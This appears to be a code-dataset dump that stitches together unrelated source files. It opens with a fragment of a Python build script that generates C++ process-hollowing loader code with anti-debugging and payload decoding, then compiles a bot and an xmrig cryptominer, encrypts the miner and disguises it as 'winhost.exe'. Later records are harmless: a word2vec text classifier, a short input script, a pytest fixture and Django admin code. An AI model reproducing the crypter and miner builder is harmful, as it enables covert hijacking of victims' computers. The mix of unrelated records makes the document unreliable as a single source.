PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\\n\\\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\\n\\\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\\n\\\n }\\n\\\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\\n\\\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\\n\\\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\\n\\\n ResumeThread(PI.hThread);\\n\\\n return 0;\\n\\\n }\\n\\\n }\\n\\\n }\\n\\\n }\\n\\\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\\n\\\n for (int i = 0; i < 550000; i++)\\n\\\n OutputDebugStringW(L\"\");\\n\\\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\\n\\\n unsigned char b = rawData[i] + 0x0%n%;\\n\\\n rawData[i] = b;\\n\\\n }\\n\\\n Sleep(((rand() % 5 + 1) + 5) * 1000);\\n\\\n RunPortableExecutable(rawData);\\n\\\n return 0;\\n\\\n }\\\n '\n txt = txt.replace(\"%n%\", str(key))\n w.write(txt)\n compileM(os.getcwd()+\"\\\\src\\\\\", \"ConsoleApplication1\")\n xcopy(os.getcwd() + \"\\\\src\\\\Release\\\\Crypter.exe\", os.getcwd()+\"\\\\\"+name+\".exe\")\n\nkey = random.randint(1, 100)\nu = sys.argv[1]\nw = sys.argv[2]\np = sys.argv[3]\nl = sys.argv[4]\na = sys.argv[5]\n\n\n\nload_userdata(u, p, w, l, a)\ncompile(os.getcwd()+\"\\\\Bot\\\\\", \"LoaderBot\")\nxcopy(os.getcwd()+\"\\\\Bot\\\\Miner\\\\bin\\\\Release\\\\LoaderBot.exe\", \"Bot.exe\")\ncompileR(os.getcwd()+\"\\\\rig\\\\\", \"xmrig\")\nxcopy(os.getcwd()+\"\\\\rig\\\\Release\\\\xmrig.exe\", \"out.exe\")\ncrypt(\"test\", key)\nos.system(\"C:\\Python27\\python.exe cv.py\")\nwriteBytes(key)\ncompileM(os.getcwd()+\"\\\\Miner\\\\\", \"winhost\")\nxcopy(os.getcwd()+\"\\\\Miner\\\\Release\\\\winhost.exe\", \"in.exe\")\nprint(os.getcwd()+\"\\\\enc.exe\")\nsubprocess.call(os.getcwd()+\"\\\\enc.exe\")\ncrypt(\"winhost\", key)\n\nos.system(\"del file.txt\")\nos.system(\"del in.exe\")\nos.system(\"del out.exe\")\nos.system(\"del decr.exe\")\nos.system(\"del enc.exe\")\nos.system(\"del test.exe\")\n",
"step-ids": [
6,
7,
8,
9,
11
]
}
|
[
6,
7,
8,
9,
11
] |
../../3.1.1/_downloads/b19d86251aea30061514e17fba258dab/nan_test.py
|
normal
|
{
"blob_id": "23bd2ed783ab117bee321d97aa1c70698bdeb387",
"index": 4587,
"step-1": "../../3.1.1/_downloads/b19d86251aea30061514e17fba258dab/nan_test.py",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from sklearn.naive_bayes import *
from sklearn import svm
from sklearn.pipeline import Pipeline
from sklearn.metrics import classification_report, confusion_matrix
from optparse import OptionParser
from helper import FileHelper, Word2VecHelper, GraphHelper
import helper
from helper.VectorHelper import *
import os
import sys
#log = helper.enableLog()
def trainW2v(args):
clazz = [["Accidents", "Arts", "Attacks", "Economy", "Miscellaneous", "Politics", "Science", "Sports","undefined"], ["Accidents", "Arts", "Attacks", "Economy", "Miscellaneous", "Politics", "Science", "Sports"], ['positive', 'negative']]
models = ['rbf', 'poly']
FileHelper.create("log")
C = 0.5 # SVM regularization parameter
gamma = 0.5
degree = 6
types = ['generic', 'specific']
if args.ontology =='dbpedia':
types.append('normal')
for classes in clazz:
task = 'pipeline2' if len(classes) == 9 else 'task2' if len(classes) == 8 else 'task1'
train_instances, train_labels, train_texts = Word2VecHelper.loadData(classes, args, 'train')
test_instances, test_labels, test_texts = Word2VecHelper.loadData(classes, args, 'test')
sys.stdout = open(
"log/{}_{}.txt".format(args.ontology, task), "w")
for model in models:
args.classifier = model
for _type in types:
args.type = _type
for merge in range(2):
args.merge = merge
if args.force == 1 or not os.path.exists("{}_{}_{}.bin".format(args.ontology, args.type, 'merged' if args.merge==1 else 'simple')):
files = ["./train/{}/{}/positive.txt".format(args.ontology, args.type),
"./train/{}/{}/negative.txt".format(args.ontology, args.type)]
model = Word2VecHelper.createModel(files, name="{}_{}".format(args.ontology, args.type),
merge=args.merge)
else:
model = Word2VecHelper.loadModel("{}_{}".format(args.ontology, args.type), merge=args.merge)
w2v = {w: vec for w, vec in zip(model.wv.index2word, model.wv.syn0)}
print("========== Model", args.ontology, args.type, args.merge, task, args.classifier, "==========")
if args.classifier == 'ben':
classifier = Pipeline([("w2v vect", MeanEmbeddingVectorizer(w2v)),
("clf", BernoulliNB())])
else:
classifier = Pipeline([("w2v vect", MeanEmbeddingVectorizer(w2v)),
("clf", svm.SVC(kernel=args.classifier, degree=degree, C=C, gamma=gamma,
probability=True))])
y_score = classifier.fit(train_texts, train_labels).predict_proba(test_texts)
y_pred = classifier.predict(test_texts)
#f.write("========= Classification Report ==========\n")
print("========= Classification Report ==========")
print(classification_report(test_labels, y_pred))
#f.write(classification_report(test_labels, y_pred)+"\n")
print("========= Confusion Matrix ==========")
#f.write("========= Confusion Matrix ==========\n")
print(confusion_matrix(test_labels,y_pred, labels=classes))
#f.write(confusion_matrix(test_labels,y_pred, labels=classes)+"\n")
GraphHelper.savePrediction("{}_{}_{}_{}_{}".format(args.ontology,args.type,args.classifier,task, args.merge), y_pred=y_pred,y_score=y_score,classes=classes,y=test_labels )
GraphHelper.saveClassifier(classifier, "{}_{}_{}_{}_{}.pkl".format(args.ontology,args.type,args.classifier,task, args.merge))
#f.close()
#trainW2v()
if __name__ == "__main__":
parser = OptionParser('''%prog -o ontology -t type -f force ''')
parser.add_option('-o', '--ontology', dest='ontology', default="dbpedia")
parser.add_option('-t', '--type', dest='type', default="generic")
parser.add_option('-f', '--force', dest='force', default=0, type=int)
parser.add_option('-c', '--classifier', dest='classifier', default='poly')
parser.add_option('-j', '--job', dest='job', type=int, default=10)
parser.add_option('-w', '--window', dest='window', type=int, default=2)
parser.add_option('-s', '--size', dest='size', type=int, default=300)
parser.add_option('-m', '--merge', dest='merge', type=int, default=0)
parser.add_option('-e', '--experiment', dest='experiment', type=int, default=1)
opts, args = parser.parse_args()
trainW2v(opts)
|
normal
|
{
"blob_id": "3bc9c6a66f749858ea5801202b0ac80755c1b347",
"index": 6493,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef trainW2v(args):\n clazz = [['Accidents', 'Arts', 'Attacks', 'Economy', 'Miscellaneous',\n 'Politics', 'Science', 'Sports', 'undefined'], ['Accidents', 'Arts',\n 'Attacks', 'Economy', 'Miscellaneous', 'Politics', 'Science',\n 'Sports'], ['positive', 'negative']]\n models = ['rbf', 'poly']\n FileHelper.create('log')\n C = 0.5\n gamma = 0.5\n degree = 6\n types = ['generic', 'specific']\n if args.ontology == 'dbpedia':\n types.append('normal')\n for classes in clazz:\n task = 'pipeline2' if len(classes) == 9 else 'task2' if len(classes\n ) == 8 else 'task1'\n train_instances, train_labels, train_texts = Word2VecHelper.loadData(\n classes, args, 'train')\n test_instances, test_labels, test_texts = Word2VecHelper.loadData(\n classes, args, 'test')\n sys.stdout = open('log/{}_{}.txt'.format(args.ontology, task), 'w')\n for model in models:\n args.classifier = model\n for _type in types:\n args.type = _type\n for merge in range(2):\n args.merge = merge\n if args.force == 1 or not os.path.exists('{}_{}_{}.bin'\n .format(args.ontology, args.type, 'merged' if args.\n merge == 1 else 'simple')):\n files = ['./train/{}/{}/positive.txt'.format(args.\n ontology, args.type),\n './train/{}/{}/negative.txt'.format(args.\n ontology, args.type)]\n model = Word2VecHelper.createModel(files, name=\n '{}_{}'.format(args.ontology, args.type), merge\n =args.merge)\n else:\n model = Word2VecHelper.loadModel('{}_{}'.format(\n args.ontology, args.type), merge=args.merge)\n w2v = {w: vec for w, vec in zip(model.wv.index2word,\n model.wv.syn0)}\n print('========== Model', args.ontology, args.type,\n args.merge, task, args.classifier, '==========')\n if args.classifier == 'ben':\n classifier = Pipeline([('w2v vect',\n MeanEmbeddingVectorizer(w2v)), ('clf',\n BernoulliNB())])\n else:\n classifier = Pipeline([('w2v vect',\n MeanEmbeddingVectorizer(w2v)), ('clf', svm.SVC(\n kernel=args.classifier, degree=degree, C=C,\n gamma=gamma, probability=True))])\n y_score = classifier.fit(train_texts, train_labels\n ).predict_proba(test_texts)\n y_pred = classifier.predict(test_texts)\n print('========= Classification Report ==========')\n print(classification_report(test_labels, y_pred))\n print('========= Confusion Matrix ==========')\n print(confusion_matrix(test_labels, y_pred, labels=classes)\n )\n GraphHelper.savePrediction('{}_{}_{}_{}_{}'.format(args\n .ontology, args.type, args.classifier, task, args.\n merge), y_pred=y_pred, y_score=y_score, classes=\n classes, y=test_labels)\n GraphHelper.saveClassifier(classifier,\n '{}_{}_{}_{}_{}.pkl'.format(args.ontology, args.\n type, args.classifier, task, args.merge))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef trainW2v(args):\n clazz = [['Accidents', 'Arts', 'Attacks', 'Economy', 'Miscellaneous',\n 'Politics', 'Science', 'Sports', 'undefined'], ['Accidents', 'Arts',\n 'Attacks', 'Economy', 'Miscellaneous', 'Politics', 'Science',\n 'Sports'], ['positive', 'negative']]\n models = ['rbf', 'poly']\n FileHelper.create('log')\n C = 0.5\n gamma = 0.5\n degree = 6\n types = ['generic', 'specific']\n if args.ontology == 'dbpedia':\n types.append('normal')\n for classes in clazz:\n task = 'pipeline2' if len(classes) == 9 else 'task2' if len(classes\n ) == 8 else 'task1'\n train_instances, train_labels, train_texts = Word2VecHelper.loadData(\n classes, args, 'train')\n test_instances, test_labels, test_texts = Word2VecHelper.loadData(\n classes, args, 'test')\n sys.stdout = open('log/{}_{}.txt'.format(args.ontology, task), 'w')\n for model in models:\n args.classifier = model\n for _type in types:\n args.type = _type\n for merge in range(2):\n args.merge = merge\n if args.force == 1 or not os.path.exists('{}_{}_{}.bin'\n .format(args.ontology, args.type, 'merged' if args.\n merge == 1 else 'simple')):\n files = ['./train/{}/{}/positive.txt'.format(args.\n ontology, args.type),\n './train/{}/{}/negative.txt'.format(args.\n ontology, args.type)]\n model = Word2VecHelper.createModel(files, name=\n '{}_{}'.format(args.ontology, args.type), merge\n =args.merge)\n else:\n model = Word2VecHelper.loadModel('{}_{}'.format(\n args.ontology, args.type), merge=args.merge)\n w2v = {w: vec for w, vec in zip(model.wv.index2word,\n model.wv.syn0)}\n print('========== Model', args.ontology, args.type,\n args.merge, task, args.classifier, '==========')\n if args.classifier == 'ben':\n classifier = Pipeline([('w2v vect',\n MeanEmbeddingVectorizer(w2v)), ('clf',\n BernoulliNB())])\n else:\n classifier = Pipeline([('w2v vect',\n MeanEmbeddingVectorizer(w2v)), ('clf', svm.SVC(\n kernel=args.classifier, degree=degree, C=C,\n gamma=gamma, probability=True))])\n y_score = classifier.fit(train_texts, train_labels\n ).predict_proba(test_texts)\n y_pred = classifier.predict(test_texts)\n print('========= Classification Report ==========')\n print(classification_report(test_labels, y_pred))\n print('========= Confusion Matrix ==========')\n print(confusion_matrix(test_labels, y_pred, labels=classes)\n )\n GraphHelper.savePrediction('{}_{}_{}_{}_{}'.format(args\n .ontology, args.type, args.classifier, task, args.\n merge), y_pred=y_pred, y_score=y_score, classes=\n classes, y=test_labels)\n GraphHelper.saveClassifier(classifier,\n '{}_{}_{}_{}_{}.pkl'.format(args.ontology, args.\n type, args.classifier, task, args.merge))\n\n\nif __name__ == '__main__':\n parser = OptionParser('%prog -o ontology -t type -f force ')\n parser.add_option('-o', '--ontology', dest='ontology', default='dbpedia')\n parser.add_option('-t', '--type', dest='type', default='generic')\n parser.add_option('-f', '--force', dest='force', default=0, type=int)\n parser.add_option('-c', '--classifier', dest='classifier', default='poly')\n parser.add_option('-j', '--job', dest='job', type=int, default=10)\n parser.add_option('-w', '--window', dest='window', type=int, default=2)\n parser.add_option('-s', '--size', dest='size', type=int, default=300)\n parser.add_option('-m', '--merge', dest='merge', type=int, default=0)\n parser.add_option('-e', '--experiment', dest='experiment', type=int,\n default=1)\n opts, args = parser.parse_args()\n trainW2v(opts)\n",
"step-4": "from sklearn.naive_bayes import *\nfrom sklearn import svm\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom optparse import OptionParser\nfrom helper import FileHelper, Word2VecHelper, GraphHelper\nimport helper\nfrom helper.VectorHelper import *\nimport os\nimport sys\n\n\ndef trainW2v(args):\n clazz = [['Accidents', 'Arts', 'Attacks', 'Economy', 'Miscellaneous',\n 'Politics', 'Science', 'Sports', 'undefined'], ['Accidents', 'Arts',\n 'Attacks', 'Economy', 'Miscellaneous', 'Politics', 'Science',\n 'Sports'], ['positive', 'negative']]\n models = ['rbf', 'poly']\n FileHelper.create('log')\n C = 0.5\n gamma = 0.5\n degree = 6\n types = ['generic', 'specific']\n if args.ontology == 'dbpedia':\n types.append('normal')\n for classes in clazz:\n task = 'pipeline2' if len(classes) == 9 else 'task2' if len(classes\n ) == 8 else 'task1'\n train_instances, train_labels, train_texts = Word2VecHelper.loadData(\n classes, args, 'train')\n test_instances, test_labels, test_texts = Word2VecHelper.loadData(\n classes, args, 'test')\n sys.stdout = open('log/{}_{}.txt'.format(args.ontology, task), 'w')\n for model in models:\n args.classifier = model\n for _type in types:\n args.type = _type\n for merge in range(2):\n args.merge = merge\n if args.force == 1 or not os.path.exists('{}_{}_{}.bin'\n .format(args.ontology, args.type, 'merged' if args.\n merge == 1 else 'simple')):\n files = ['./train/{}/{}/positive.txt'.format(args.\n ontology, args.type),\n './train/{}/{}/negative.txt'.format(args.\n ontology, args.type)]\n model = Word2VecHelper.createModel(files, name=\n '{}_{}'.format(args.ontology, args.type), merge\n =args.merge)\n else:\n model = Word2VecHelper.loadModel('{}_{}'.format(\n args.ontology, args.type), merge=args.merge)\n w2v = {w: vec for w, vec in zip(model.wv.index2word,\n model.wv.syn0)}\n print('========== Model', args.ontology, args.type,\n args.merge, task, args.classifier, '==========')\n if args.classifier == 'ben':\n classifier = Pipeline([('w2v vect',\n MeanEmbeddingVectorizer(w2v)), ('clf',\n BernoulliNB())])\n else:\n classifier = Pipeline([('w2v vect',\n MeanEmbeddingVectorizer(w2v)), ('clf', svm.SVC(\n kernel=args.classifier, degree=degree, C=C,\n gamma=gamma, probability=True))])\n y_score = classifier.fit(train_texts, train_labels\n ).predict_proba(test_texts)\n y_pred = classifier.predict(test_texts)\n print('========= Classification Report ==========')\n print(classification_report(test_labels, y_pred))\n print('========= Confusion Matrix ==========')\n print(confusion_matrix(test_labels, y_pred, labels=classes)\n )\n GraphHelper.savePrediction('{}_{}_{}_{}_{}'.format(args\n .ontology, args.type, args.classifier, task, args.\n merge), y_pred=y_pred, y_score=y_score, classes=\n classes, y=test_labels)\n GraphHelper.saveClassifier(classifier,\n '{}_{}_{}_{}_{}.pkl'.format(args.ontology, args.\n type, args.classifier, task, args.merge))\n\n\nif __name__ == '__main__':\n parser = OptionParser('%prog -o ontology -t type -f force ')\n parser.add_option('-o', '--ontology', dest='ontology', default='dbpedia')\n parser.add_option('-t', '--type', dest='type', default='generic')\n parser.add_option('-f', '--force', dest='force', default=0, type=int)\n parser.add_option('-c', '--classifier', dest='classifier', default='poly')\n parser.add_option('-j', '--job', dest='job', type=int, default=10)\n parser.add_option('-w', '--window', dest='window', type=int, default=2)\n parser.add_option('-s', '--size', dest='size', type=int, default=300)\n parser.add_option('-m', '--merge', dest='merge', type=int, default=0)\n parser.add_option('-e', '--experiment', dest='experiment', type=int,\n default=1)\n opts, args = parser.parse_args()\n trainW2v(opts)\n",
"step-5": "from sklearn.naive_bayes import *\nfrom sklearn import svm\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom optparse import OptionParser\nfrom helper import FileHelper, Word2VecHelper, GraphHelper\nimport helper\nfrom helper.VectorHelper import *\n\nimport os\nimport sys\n\n\n#log = helper.enableLog()\n\ndef trainW2v(args):\n clazz = [[\"Accidents\", \"Arts\", \"Attacks\", \"Economy\", \"Miscellaneous\", \"Politics\", \"Science\", \"Sports\",\"undefined\"], [\"Accidents\", \"Arts\", \"Attacks\", \"Economy\", \"Miscellaneous\", \"Politics\", \"Science\", \"Sports\"], ['positive', 'negative']]\n models = ['rbf', 'poly']\n FileHelper.create(\"log\")\n\n C = 0.5 # SVM regularization parameter\n gamma = 0.5\n degree = 6\n types = ['generic', 'specific']\n if args.ontology =='dbpedia':\n types.append('normal')\n\n for classes in clazz:\n task = 'pipeline2' if len(classes) == 9 else 'task2' if len(classes) == 8 else 'task1'\n train_instances, train_labels, train_texts = Word2VecHelper.loadData(classes, args, 'train')\n test_instances, test_labels, test_texts = Word2VecHelper.loadData(classes, args, 'test')\n\n sys.stdout = open(\n \"log/{}_{}.txt\".format(args.ontology, task), \"w\")\n\n for model in models:\n args.classifier = model\n\n for _type in types:\n args.type = _type\n for merge in range(2):\n args.merge = merge\n if args.force == 1 or not os.path.exists(\"{}_{}_{}.bin\".format(args.ontology, args.type, 'merged' if args.merge==1 else 'simple')):\n files = [\"./train/{}/{}/positive.txt\".format(args.ontology, args.type),\n \"./train/{}/{}/negative.txt\".format(args.ontology, args.type)]\n model = Word2VecHelper.createModel(files, name=\"{}_{}\".format(args.ontology, args.type),\n merge=args.merge)\n else:\n model = Word2VecHelper.loadModel(\"{}_{}\".format(args.ontology, args.type), merge=args.merge)\n\n w2v = {w: vec for w, vec in zip(model.wv.index2word, model.wv.syn0)}\n\n print(\"========== Model\", args.ontology, args.type, args.merge, task, args.classifier, \"==========\")\n if args.classifier == 'ben':\n classifier = Pipeline([(\"w2v vect\", MeanEmbeddingVectorizer(w2v)),\n (\"clf\", BernoulliNB())])\n else:\n classifier = Pipeline([(\"w2v vect\", MeanEmbeddingVectorizer(w2v)),\n (\"clf\", svm.SVC(kernel=args.classifier, degree=degree, C=C, gamma=gamma,\n probability=True))])\n\n y_score = classifier.fit(train_texts, train_labels).predict_proba(test_texts)\n y_pred = classifier.predict(test_texts)\n #f.write(\"========= Classification Report ==========\\n\")\n print(\"========= Classification Report ==========\")\n print(classification_report(test_labels, y_pred))\n #f.write(classification_report(test_labels, y_pred)+\"\\n\")\n\n print(\"========= Confusion Matrix ==========\")\n #f.write(\"========= Confusion Matrix ==========\\n\")\n print(confusion_matrix(test_labels,y_pred, labels=classes))\n #f.write(confusion_matrix(test_labels,y_pred, labels=classes)+\"\\n\")\n\n GraphHelper.savePrediction(\"{}_{}_{}_{}_{}\".format(args.ontology,args.type,args.classifier,task, args.merge), y_pred=y_pred,y_score=y_score,classes=classes,y=test_labels )\n GraphHelper.saveClassifier(classifier, \"{}_{}_{}_{}_{}.pkl\".format(args.ontology,args.type,args.classifier,task, args.merge))\n\n #f.close()\n\n#trainW2v()\n\nif __name__ == \"__main__\":\n parser = OptionParser('''%prog -o ontology -t type -f force ''')\n parser.add_option('-o', '--ontology', dest='ontology', default=\"dbpedia\")\n parser.add_option('-t', '--type', dest='type', default=\"generic\")\n parser.add_option('-f', '--force', dest='force', default=0, type=int)\n parser.add_option('-c', '--classifier', dest='classifier', default='poly')\n parser.add_option('-j', '--job', dest='job', type=int, default=10)\n parser.add_option('-w', '--window', dest='window', type=int, default=2)\n parser.add_option('-s', '--size', dest='size', type=int, default=300)\n parser.add_option('-m', '--merge', dest='merge', type=int, default=0)\n parser.add_option('-e', '--experiment', dest='experiment', type=int, default=1)\n opts, args = parser.parse_args()\n\n trainW2v(opts)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Create a program that will ask the users name, age, and reddit username.
# Have it tell them the information back, in the format:
#
# Your name is (blank), you are (blank) years old, and your username is (blank)
#
# For extra credit, have the program log this information in a file to be accessed later.
#
name = input("What is your name? ")
age = input("How old are you? ")
reddit = input("What is your reddit username? ")
print("Your name is " + name + ", you are " + age + " years old, and your username is " + reddit)
|
normal
|
{
"blob_id": "00531c5a7fdcd24204b0546c081bbe7d63d0a6b2",
"index": 1520,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('Your name is ' + name + ', you are ' + age +\n ' years old, and your username is ' + reddit)\n",
"step-3": "name = input('What is your name? ')\nage = input('How old are you? ')\nreddit = input('What is your reddit username? ')\nprint('Your name is ' + name + ', you are ' + age +\n ' years old, and your username is ' + reddit)\n",
"step-4": "# Create a program that will ask the users name, age, and reddit username. \n# Have it tell them the information back, in the format:\n# \n# Your name is (blank), you are (blank) years old, and your username is (blank)\n# \n# For extra credit, have the program log this information in a file to be accessed later.\n# \n\nname = input(\"What is your name? \")\nage = input(\"How old are you? \")\nreddit = input(\"What is your reddit username? \")\n\nprint(\"Your name is \" + name + \", you are \" + age + \" years old, and your username is \" + reddit)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding: utf-8 -*-
"""pytest People functions, fixtures and tests."""
import pytest
import ciscosparkapi
from tests.utils import create_string
# Helper Functions
# pytest Fixtures
@pytest.fixture(scope="session")
def me(api):
return api.people.me()
|
normal
|
{
"blob_id": "9b7ffa2bb62a8decbec51c6bdea38b4338726816",
"index": 1891,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\[email protected](scope='session')\ndef me(api):\n return api.people.me()\n",
"step-3": "<mask token>\nimport pytest\nimport ciscosparkapi\nfrom tests.utils import create_string\n\n\[email protected](scope='session')\ndef me(api):\n return api.people.me()\n",
"step-4": "# -*- coding: utf-8 -*-\n\n\"\"\"pytest People functions, fixtures and tests.\"\"\"\n\n\nimport pytest\n\nimport ciscosparkapi\nfrom tests.utils import create_string\n\n\n# Helper Functions\n\n\n\n\n# pytest Fixtures\n\[email protected](scope=\"session\")\ndef me(api):\n return api.people.me()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#coding=utf-8
'''
Created on 04/09/2012
@author: Johnny
'''
from ckeditor.widgets import CKEditorWidget
from django.conf.urls import patterns, url
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.templatetags.static import static
import views
from portfolio.models import *
from custom_admin import custom_admin
from custom_admin.custom_model_admin import CustomModelAdmin
from django import forms
class CaracteristicaServicoAdmin(CustomModelAdmin):
list_display = ('descricao',)
search_fields = ['descricao']
exclude = ['slug']
class ServicoForm(forms.ModelForm):
descricao = forms.CharField(widget=CKEditorWidget())
class Meta:
model = Servico
class ServicosAdmin(CustomModelAdmin):
list_display = ('imagem_icone','titulo','intro',)
list_display_links = ('titulo','intro',)
search_fields = ['titulo','intro','descricao']
list_filter = ['caracteristicas']
exclude = ['slug']
form = ServicoForm
def configuracoes_servicos_view(self,request):
import forms
from string import capitalize
from django.utils.encoding import force_unicode
from django.contrib.admin import helpers
model = self.model
opts = model._meta
prepopuled_fields = {}
add, change = True,False
if request.method == 'POST': # If the form has been submitted...
form = forms.ConfigServicoForm(request.POST,request.FILES) # A form bound to the POST data
if request.POST.has_key('_update'):
form.fields['imagem'].required = False
if form.is_valid(): # All validation rules pass
form.fields['imagem'].required = True
try:
texto = TextoPagina.objects.get(slug='texto_servico')
except:
texto = TextoPagina()
if texto.texto == None or texto.texto != form.cleaned_data['texto']:
texto.texto = form.cleaned_data['texto']
if not request.POST.has_key('_update') or request.FILES.has_key('imagem'):
texto.imagem = request.FILES['imagem']
texto.slug = 'texto_servico'
texto.save()
form = forms.ConfigServicoForm()
form.initial['texto'] = texto.texto
form.initial['imagem'] = texto.imagem
change = True
add = False
else:
form = forms.ConfigServicoForm()
try:
texto = TextoPagina.objects.get(slug='texto_servico')
change = True
add = False
form.initial['texto'] = texto.texto
form.initial['imagem'] = texto.imagem
except:
pass
adminForm = helpers.AdminForm(form,[('Texto da página de serviços',{'fields':['imagem','texto']})],prepopuled_fields)
media = self.media + adminForm.media
return render_to_response('admin/config_form.html',
{
'add':add,
'change':change,
'title': 'Configurações',
'is_popup': "_popup" in request.REQUEST,
'show_delete': False,
'has_delete_permission':False,
'has_add_permission':True,
'has_change_permission':True,
'errors': form.errors,
'app_label': opts.app_label,
'current_app':capitalize(opts.app_label),
'all_app_list':self.admin_site.all_app_list(request),
'module_name': force_unicode(opts.verbose_name_plural),
'opts':opts,
'has_file_field':True,
'adminform':adminForm,
'save_as':False,
'media':media,
}
,context_instance=RequestContext(request))
def get_urls(self):
urls = super(ServicosAdmin, self).get_urls()
info = self.model._meta.app_label, self.model._meta.module_name
my_urls = patterns('',
url(r'^config/$', custom_admin.custom_site.admin_view(self.configuracoes_servicos_view),name='%s_%s_config' % info),
)
return my_urls + urls
@property
def media(self):
super_media = super(ServicosAdmin, self).media
js = [
'cufon-yui.js',
'TitilliumText.font.js',
'cufon-replace-ckeditor.js',
]
current_media = forms.Media(js=[static('js/%s' % url) for url in js])
media = super_media + current_media
return media
def get_model_perms(self, request):
permiss = super(ServicosAdmin, self).get_model_perms(request)
permiss['config'] = self.has_change_permission(request) and self.has_add_permission(request)
return permiss
class ClientesAdmin(CustomModelAdmin):
list_display = ('imagem_icone','descricao','site')
list_display_links = ('descricao',)
search_fields = ['site','descricao']
exclude = ['slug']
class TrabalhoForm(forms.Form):
descricao = forms.CharField(widget=CKEditorWidget())
class Meta:
model = Trabalho
class TrabalhoAdmin(CustomModelAdmin):
list_display = ('titulo','descricao_pequena','servico','cliente')
search_fields = ['titulo']
list_filter = ['servico']
exclude = ['slug']
custom_admin.custom_site.register(Cliente,ClientesAdmin)
custom_admin.custom_site.register(CaracteristicaServico,CaracteristicaServicoAdmin)
custom_admin.custom_site.register(Servico,ServicosAdmin)
custom_admin.custom_site.register(Trabalho,TrabalhoAdmin)
|
normal
|
{
"blob_id": "caac9dfc7d52607c2af67ddc03a3a7bdae9911bb",
"index": 8204,
"step-1": "<mask token>\n\n\nclass ServicoForm(forms.ModelForm):\n <mask token>\n\n\n class Meta:\n model = Servico\n\n\nclass ServicosAdmin(CustomModelAdmin):\n list_display = 'imagem_icone', 'titulo', 'intro'\n list_display_links = 'titulo', 'intro'\n search_fields = ['titulo', 'intro', 'descricao']\n list_filter = ['caracteristicas']\n exclude = ['slug']\n form = ServicoForm\n\n def configuracoes_servicos_view(self, request):\n import forms\n from string import capitalize\n from django.utils.encoding import force_unicode\n from django.contrib.admin import helpers\n model = self.model\n opts = model._meta\n prepopuled_fields = {}\n add, change = True, False\n if request.method == 'POST':\n form = forms.ConfigServicoForm(request.POST, request.FILES)\n if request.POST.has_key('_update'):\n form.fields['imagem'].required = False\n if form.is_valid():\n form.fields['imagem'].required = True\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n except:\n texto = TextoPagina()\n if texto.texto == None or texto.texto != form.cleaned_data[\n 'texto']:\n texto.texto = form.cleaned_data['texto']\n if not request.POST.has_key('_update'\n ) or request.FILES.has_key('imagem'):\n texto.imagem = request.FILES['imagem']\n texto.slug = 'texto_servico'\n texto.save()\n form = forms.ConfigServicoForm()\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n change = True\n add = False\n else:\n form = forms.ConfigServicoForm()\n try:\n texto = TextoPagina.objects.get(slug='texto_servico')\n change = True\n add = False\n form.initial['texto'] = texto.texto\n form.initial['imagem'] = texto.imagem\n except:\n pass\n adminForm = helpers.AdminForm(form, [('Texto da página de serviços',\n {'fields': ['imagem', 'texto']})], prepopuled_fields)\n media = self.media + adminForm.media\n return render_to_response('admin/config_form.html', {'add': add,\n 'change': change, 'title': 'Configurações', 'is_popup': \n '_popup' in request.REQUEST, 'show_delete': False,\n 'has_delete_permission': False, 'has_add_permission': True,\n 'has_change_permission': True, 'errors': form.errors,\n 'app_label': opts.app_label, 'current_app': capitalize(opts.\n app_label), 'all_app_list': self.admin_site.all_app_list(\n request), 'module_name': force_unicode(opts.verbose_name_plural\n ), 'opts': opts, 'has_file_field': True, 'adminform': adminForm,\n 'save_as': False, 'media': media}, context_instance=\n RequestContext(request))\n\n def get_urls(self):\n urls = super(ServicosAdmin, self).get_urls()\n info = self.model._meta.app_label, self.model._meta.module_name\n my_urls = patterns('', url('^config/$', custom_admin.custom_site.\n admin_view(self.configuracoes_servicos_view), name=\n '%s_%s_config' % info))\n return my_urls + urls\n\n @property\n def media(self):\n super_media = super(ServicosAdmin, self).media\n js = ['cufon-yui.js', 'TitilliumText.font.js',\n 'cufon-replace-ckeditor.js']\n current_media = forms.Media(js=[static('js/%s' % url) for url in js])\n media = super_media + current_media\n return media\n\n def get_model_perms(self, request):\n permiss = super(ServicosAdmin, self).get_model_perms(request)\n permiss['config'] = self.has_change_permission(request\n ) and self.has_add_permission(request)\n return permiss\n\n\nclass ClientesAdmin(CustomModelAdmin):\n list_display = 'imagem_icone', 'descricao', 'site'\n list_display_links = 'descricao',\n search_fields = ['site', 'descricao']\n exclude = ['slug']\n\n\nclass TrabalhoForm(forms.Form):\n descricao = forms.CharField(widget=CKEditorWidget())\n\n\n class Meta:\n model = Trabalho\n\n\nclass TrabalhoAdmin(CustomModelAdmin):\n list_display = 'titulo', 'descricao_pequena', 'servico', 'cliente'\n search_fields = ['titulo']\n list_filter = ['servico']\n exclude = ['slug']\n\n\n<mask token>\n",
